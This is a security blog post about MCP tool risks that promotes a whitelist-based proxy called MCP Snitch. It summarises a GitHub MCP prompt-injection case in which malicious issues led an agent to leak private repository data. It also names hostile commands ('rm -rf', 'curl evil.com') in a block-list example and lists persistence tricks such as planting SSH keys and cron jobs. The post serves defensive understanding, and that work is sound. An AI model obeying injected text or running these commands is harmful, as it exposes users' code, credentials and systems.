While we believe MCP security will eventually be built directly into IDEs—much like browsers evolved to provide sandboxing, same-origin policies, and permission systems—and that MCP server developers will increasingly implement security at the source, today's reality demands alternate solutions. This post explores the security model behind MCP proxying and our implementation: MCP Snitch.

The Threat Model

Let's be explicit about what we're defending against. MCP introduces three fundamental attack surfaces: prompt injection, overprivileged access, and context confusion.

The GitHub MCP vulnerability exemplified all three: malicious issues (prompt injection) could leverage broad GitHub tokens (overprivileged access) to exfiltrate private repository data (context confusion). This is an architectural consequence of MCP's trust model.

Browser Security Evolution as a Blueprint

The browser security journey from 1995 to today provides a clear roadmap for MCP security. Early browsers had no security model—JavaScript could access the filesystem directly and any script could read any data, exactly like MCP tools today with their full access tokens.

The transformation came through three phases: the introduction of the same-origin policy to isolate domains; process sandboxing, where Chrome isolated each tab in restricted processes that couldn't make direct system calls; and permission APIs that required explicit user consent for sensitive operations like camera or location access.

The technical implementation relied on OS-level process isolation and a broker/worker architecture. Chrome's model is instructive: untrusted renderer processes run with heavily restricted tokens and must request all I/O operations through a privileged broker process via IPC. This prevented entire classes of attacks—a compromised renderer can't access files, spawn processes, or make network requests without broker mediation.

Browsers also developed runtime permission models where users grant temporary, revocable permissions per operation, not the permanent environment variable credentials MCP uses today.

MCP needs these same primitives: process isolation between tools (so one compromised tool can't access another's data), a broker/worker architecture where tools run in sandboxed processes with mediated access to resources, and runtime permissions that are operation-specific and user-controlled.
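To make the broker idea concrete, here is a minimal sketch of the permission bookkeeping such a broker might do. It assumes a hypothetical `Broker` class and `Grant` record (neither is part of MCP or of any existing tool) and models only the decision logic. Real isolation would also require OS-level sandboxing of the tool processes, which this sketch does not attempt.

```python
import time
from dataclasses import dataclass, field


@dataclass(frozen=True)
class Grant:
    """A user-approved permission for one tool, one operation, one resource."""
    tool: str
    operation: str
    resource: str
    expires_at: float  # Unix timestamp after which the grant is dead


@dataclass
class Broker:
    """Hypothetical privileged component that mediates every resource request."""
    grants: list = field(default_factory=list)

    def grant(self, tool, operation, resource, ttl_seconds, now=None):
        # Record a temporary permission, as if the user had just approved it.
        now = time.time() if now is None else now
        self.grants.append(Grant(tool, operation, resource, now + ttl_seconds))

    def revoke(self, tool):
        # Drop every grant held by one tool; other tools are unaffected.
        self.grants = [g for g in self.grants if g.tool != tool]

    def request(self, tool, operation, resource, now=None):
        # A sandboxed tool asks for access; only a live, exact match succeeds.
        now = time.time() if now is None else now
        return any(
            g.tool == tool
            and g.operation == operation
            and g.resource == resource
            and g.expires_at > now
            for g in self.grants
        )
```

Because grants are keyed by tool, a grant issued to one tool never satisfies a request from another, which is the isolation property described above.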

Instead of today's GitHub PAT that often grants full repository access, MCP should request permission for "read issues from repo X" when needed. Until MCP implements these architectural changes—which took browsers 25 years to perfect, mind you—proxy-based security like MCP Snitch provides the essential mediation layer by intercepting tool calls, enforcing whitelists, and giving users visibility and control over operations.

An Authentication Scoping Catastrophe

Current MCP authentication is fundamentally broken at multiple levels. The ideal architecture would require just-in-time (JIT) token provisioning: credentials minted per operation and expiring within minutes. To understand why we are far from that, let's look at how API authentication works today versus what security actually requires.

Current State: The GitHub PAT Problem

When you create a classic GitHub Personal Access Token for MCP, you're forced to grant permissions at the repository or organization level. Want to read issues from one repo? Your token must have the "repo" scope, granting read/write access to all repositories, including private code, secrets, and deployment keys. This isn't unique to GitHub; most API providers follow this pattern.

Consider what a typical GitHub PAT actually grants:

- repo scope: Full control of private repositories (all of them)

- read:org: Read org and team membership (across all orgs)

- workflow: Update GitHub Actions (security critical)

What We Actually Need: Operation-Level Scoping

Each MCP operation should request only what it needs, when it needs it:

Operation: "Read issue #42 from facebook/react"

Required permission: read:issues:facebook/react:42

Token lifetime: 5 minutes

Instead, we get:

Operation: "Read issue #42 from facebook/react"

Actual permission used: Full read/write to all repos

Token lifetime: 90 days (or permanent)
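The gap between the two cases can be sketched in a few lines. The example below assumes a hypothetical token service with `mint_token` and `is_allowed` helpers. The scope string format mirrors the `read:issues:facebook/react:42` example above and is illustrative only; no API provider mentioned in this post is known to accept it.

```python
import secrets
import time
from dataclasses import dataclass


@dataclass(frozen=True)
class ScopedToken:
    value: str         # opaque bearer value
    scope: str         # e.g. "read:issues:facebook/react:42"
    expires_at: float  # Unix timestamp


def mint_token(action, resource_type, repo, item, ttl_seconds=300, now=None):
    """Mint a token valid for exactly one operation, for five minutes by default."""
    now = time.time() if now is None else now
    scope = f"{action}:{resource_type}:{repo}:{item}"
    return ScopedToken(secrets.token_urlsafe(32), scope, now + ttl_seconds)


def is_allowed(token, requested_scope, now=None):
    """Allow a request only if the scope matches exactly and the token is live."""
    now = time.time() if now is None else now
    return token.scope == requested_scope and now < token.expires_at
```

With this model, a token minted for issue 42 is useless for issue 43, for writes, or after its five minutes are up, which is the opposite of a 90-day token with full repository access.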

Modern OAuth Can't Save Us

OAuth 2.0 Rich Authorization Requests (RAR, RFC 9396) theoretically support this fine-grained, dynamic scoping. You could request {"type": "issue", "actions": ["read"], "repository": "facebook/react", "issue": 42}.
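As a rough illustration of what such a request could look like on the wire, the sketch below serializes the object above into the `authorization_details` parameter that RAR defines. The client ID, redirect URI, and the `build_authorization_request` helper are placeholders invented for this example, and the `repository` and `issue` fields are API-specific extensions that a provider would have to define.

```python
import json
from urllib.parse import parse_qs, urlencode


def build_authorization_request(client_id, redirect_uri, details):
    """Build the query string for an authorization request carrying RAR details."""
    params = {
        "response_type": "code",
        "client_id": client_id,
        "redirect_uri": redirect_uri,
        # RAR carries a JSON array of detail objects, each with a "type" field.
        "authorization_details": json.dumps(details, separators=(",", ":")),
    }
    return urlencode(params)


details = [
    {
        "type": "issue",
        "actions": ["read"],
        "repository": "facebook/react",
        "issue": 42,
    }
]

# Hypothetical client values, for illustration only.
query = build_authorization_request(
    "example-client", "https://client.example/callback", details
)
```

The resulting query string would be appended to the provider's authorization endpoint, assuming the provider understood the `issue` detail type at all.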

But adoption is essentially zero because:

- API Provider Burden: Providers must rebuild their entire permission system to support granular, dynamic requests

- Backwards Compatibility: Billions of existing OAuth integrations use static scopes

- Economic Incentive Misalignment: Providers like broad tokens—they're simpler to implement and audit

Google Cloud's IAM comes closest with its resource-level permissions, but even it falls back to project-wide service accounts for most operations. AWS STS can generate temporary credentials with specific policies, but the complexity means most developers just use permanent IAM users with AdministratorAccess.



A Proxy Security Model

Given these constraints, the proxy pattern emerges as the most viable security solution.
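As a rough sketch of what mediation means in practice: MCP messages are JSON-RPC 2.0, and tool invocations use the `tools/call` method with the tool name in `params.name`. A proxy sitting between client and server can inspect each message and either forward it or answer with an error itself. The `mediate` function and the `-32000` error code below are assumptions made for illustration, not MCP Snitch's actual code.

```python
import json


def mediate(raw_message, allowed_tools):
    """Decide what to do with one client-to-server JSON-RPC message.

    Returns ("forward", message) to pass it on unchanged, or
    ("reject", error_response) to answer the client without
    ever contacting the MCP server.
    """
    msg = json.loads(raw_message)

    # Only tool invocations are policed here; everything else passes through.
    if msg.get("method") != "tools/call":
        return "forward", msg

    tool = msg.get("params", {}).get("name")
    if tool in allowed_tools:
        return "forward", msg

    # Assumed error code from the implementation-defined JSON-RPC range.
    error = {
        "jsonrpc": "2.0",
        "id": msg.get("id"),
        "error": {
            "code": -32000,
            "message": f"Tool '{tool}' is not on the allowlist",
        },
    }
    return "reject", error
```

A rejected call never reaches the server, so the credentials the server holds are never exercised for that operation.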

Core Security Principles for MCP Proxies

Whitelist-Based Access Control

The most effective security measure is an explicit allowlist (whitelist) of permitted operations. Unlike a denylist (blacklist), which requires anticipating every possible attack, whitelisting ensures only approved actions proceed:

Whitelist Approach

─────────

• Default: DENY ALL

• Explicitly allow: read_file, list_issues

• Result: Unknown attacks automatically blocked

Blacklist Approach (inferior)

──────────────

• Default: ALLOW ALL

• Block known bad: rm -rf, curl evil.com

• Result: Novel attacks succeed

MCP Snitch implements this through a UI-based whitelist where users explicitly approve tool calls, providing visibility and control over what operations AI agents can perform.
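The difference between the two defaults is easy to show in code. This sketch reuses the example entries from the comparison above; the third operation in `sample_operations` is a made-up "novel attack" that appears on neither list. It illustrates the policy logic only and is not how MCP Snitch stores or evaluates its whitelist.

```python
ALLOWLIST = {"read_file", "list_issues"}
DENYLIST = {"rm -rf", "curl evil.com"}


def allowlist_permits(operation):
    # Default deny: only operations that were explicitly approved pass.
    return operation in ALLOWLIST


def denylist_permits(operation):
    # Default allow: only operations already known to be bad are blocked.
    return operation not in DENYLIST


# Hypothetical inputs: one approved call, one known-bad call, one novel attack.
sample_operations = ["read_file", "rm -rf", "wget evil.example | sh"]

for op in sample_operations:
    print(f"{op!r}: allowlist={allowlist_permits(op)} denylist={denylist_permits(op)}")
```

The novel operation is blocked by the allowlist without anyone having anticipated it, while the denylist lets it through.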

Why Not Trust-on-First-Use?

You might wonder about using Trust-on-First-Use (TOFU) pinning for tool definitions, similar to SSH host key verification. We explicitly rejected this approach for several reasons:

- Users want updates - MCP servers frequently update with bug fixes and new features. Pinning would break this natural flow.

- First use isn't trustworthy - There's no guarantee the first version you see is legitimate. You could be pinning a compromised version.

- Poor UX - Constant approval requests for legitimate updates would train users to blindly approve everything.

Instead, focusing on runtime security through whitelisting and monitoring provides better protection without hampering usability.
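For readers unfamiliar with the approach we rejected, here is a minimal sketch of what TOFU pinning of tool definitions would look like. The `fingerprint` and `check_pin` helpers are hypothetical; the `name`, `description`, and `inputSchema` fields follow the shape of an MCP tool definition.

```python
import hashlib
import json


def fingerprint(tool_definition):
    """Hash a canonical JSON encoding of a tool definition."""
    canonical = json.dumps(tool_definition, sort_keys=True, separators=(",", ":"))
    return hashlib.sha256(canonical.encode("utf-8")).hexdigest()


def check_pin(pins, name, tool_definition):
    """Return "pinned" on first use, "match" if unchanged, "changed" otherwise."""
    digest = fingerprint(tool_definition)
    if name not in pins:
        # First use: whatever we see is trusted, legitimate or not.
        pins[name] = digest
        return "pinned"
    return "match" if pins[name] == digest else "changed"


v1 = {
    "name": "list_issues",
    "description": "List issues in a repository",
    "inputSchema": {"type": "object", "properties": {"repo": {"type": "string"}}},
}
# A harmless documentation fix is enough to change the fingerprint.
v2 = dict(v1, description="List open issues in a repository")
```

Both weaknesses show up directly: the first definition is pinned without any check of its legitimacy, and a one-word description change in `v2` is indistinguishable from a malicious rewrite, so it triggers the same approval prompt.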

Real Attack Scenarios

Let's examine how the proxy model prevents real attacks:

GitHub MCP Attack

[Diagram not recovered: the GitHub MCP attack flow "Without Proxy" compared with "With Security Proxy"]

The long-term solution requires fundamental changes:

Protocol Level: MCP needs built-in security primitives—authentication, authorization, and audit capabilities as first-class features.

Platform Level: API providers must support fine-grained, temporal scoping. A "read one file" operation shouldn't require "access all repositories" permission.

IDE Level: Development environments should provide Chrome-style sandboxing and permission models for MCP connections.

Ecosystem Level: We need security standards and certification processes for MCP servers, similar to app store review processes.

Until these architectural improvements arrive, proxy-based security provides the essential protection layer.

Proxy Protection Isn’t Perfect

While proxy-based security addresses some immediate MCP risks, several attack vectors require different defensive strategies.

Supply Chain Attacks

MCP servers are distributed as npm packages, Python packages, or binaries. A compromised MCP server package has full access to your credentials before any proxy can intervene. The recent XZ backdoor attempt showed how patient attackers infiltrate open source projects. With MCP servers often maintained by individuals or small teams, they're attractive targets.

The mcp-server-sqlite package has thousands of downloads. If compromised, it could exfiltrate any database it touches. Your proxy would see "normal" SQLite operations while the server simultaneously sends data elsewhere through its own network connections.

Persistent Access Through Configuration

MCP servers can modify their own configuration files or drop persistence mechanisms. A malicious server could:

- Add SSH keys to ~/.ssh/authorized_keys

- Modify shell profiles to maintain access

- Create cron jobs or systemd services

- Alter git configs to redirect pushes

These happen outside MCP protocol boundaries—the proxy never sees them because they're direct filesystem operations from the server process.

Data Persistence and State Attacks

MCP servers often need to store state—SQLite databases, cached files, checkpoint data. A malicious server could:

- Store exfiltrated data locally, retrieving it later during a "legitimate" operation

- Modify databases to include backdoor queries

- Use local storage as a command-and-control channel

These attacks exploit the fact that MCP servers are full applications with filesystem access.

Other Downsides

Performance Impact

Every MCP operation now routes through an additional process. For high-frequency operations like filesystem access or database queries, this adds measurable latency. A direct SQLite query might take 1ms; through a proxy it's 3-5ms. For an AI agent making hundreds of calls, this compounds. It's a slight inconvenience for most use cases, but for performance-critical applications, it matters.
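To put rough numbers on "this compounds", the sketch below multiplies the per-call overhead by a call count. The 1ms and 3-5ms figures come from the paragraph above; the 500-call session is an assumed value chosen to stand in for "hundreds of calls".

```python
def added_latency_seconds(calls, direct_ms, proxied_ms):
    """Total extra wall-clock time, in seconds, spent going through the proxy."""
    return calls * (proxied_ms - direct_ms) / 1000.0


# Assumed session size; per-call timings are the illustrative ones above.
CALLS = 500
best_case = added_latency_seconds(CALLS, direct_ms=1.0, proxied_ms=3.0)
worst_case = added_latency_seconds(CALLS, direct_ms=1.0, proxied_ms=5.0)

print(f"Added latency over {CALLS} calls: {best_case:.1f}s to {worst_case:.1f}s")
```

Under these assumptions the proxy adds between one and two seconds per session if the calls run sequentially: negligible for interactive use, noticeable in a tight automated loop.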

Single Point of Failure

When the proxy crashes or hangs, all MCP operations stop. Unlike direct connections, where individual servers might fail independently, the proxy creates a critical dependency. Your AI agent can't fall back to alternative tools or gracefully degrade—everything just stops working. You need monitoring on the proxy itself, adding operational complexity.

Limited Protocol Visibility

The proxy only sees MCP protocol traffic. It can't inspect:

- Direct network calls made by the MCP server outside the protocol

- Filesystem operations beyond what's reported through MCP

- Child processes spawned by the server

- Memory-only operations that never cross the protocol boundary

These limitations mean proxy-based security is necessary but not sufficient. You still need defense-in-depth: code reviews, dependency scanning, runtime monitoring, and the principle of least privilege at every layer.

Conclusion

MCP security today is fundamentally broken at the architectural level. The combination of overprivileged credentials, no runtime boundaries, and invisible operations creates risk not only for individual organizations but for the entire ecosystem of open-source tooling.

MCP Snitch (github.com/Adversis/mcp-snitch) implements the proxy model described above with a focus on practical security: allowlist-based controls, API key protection, and comprehensive visibility through its UI. It's probably the only MCP security tool you need right now because it addresses the core vulnerabilities without requiring changes to your existing infrastructure.

The browser security evolution took 25 years. We don't have that luxury with MCP—the risks are immediate and real. Proxy-based security gives us protection today while we work toward the proper architectural solutions tomorrow.

For more on MCP security:

- Trail of Bits: We built the security layer MCP always needed

- CaMeL offers a promising new direction for mitigating prompt injection attacks

- MCP Documentation: Getting Started

Visit mcpsnitch.ai to learn more about our approach.

This post represents our current thinking on MCP security. As the protocol evolves, so will our strategies. We welcome feedback and contributions at github.com/Adversis/mcp-snitch.